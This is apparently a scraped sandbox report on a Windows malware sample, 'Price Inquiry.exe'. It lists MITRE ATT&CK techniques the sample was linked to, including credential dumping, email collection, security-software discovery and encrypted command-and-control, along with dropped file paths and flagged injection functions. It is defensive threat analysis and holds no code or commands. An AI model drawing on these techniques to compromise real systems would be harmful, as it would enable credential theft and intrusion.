Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Price Inquiry.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Price Inquiry.exe.log

C:\Users\user\AppData\Local\Temp\q3a81SS

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Price Inquiry.exe

Function 08E87B30 Relevance: 3.0, Strings: 2, Instructions: 527
COMMON

Function 076B3A25 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Function 076B3A30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0111B3F9 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Function 011144B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 011158EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 076B37A0 Relevance: 1.6, APIs: 1, Instructions: 75
injectionCOMMON

Function 076B37A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 076B3608 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 076B3890 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 0111B2F4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 076B3610 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 076B3898 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 0111D8E0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 076B36E0 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre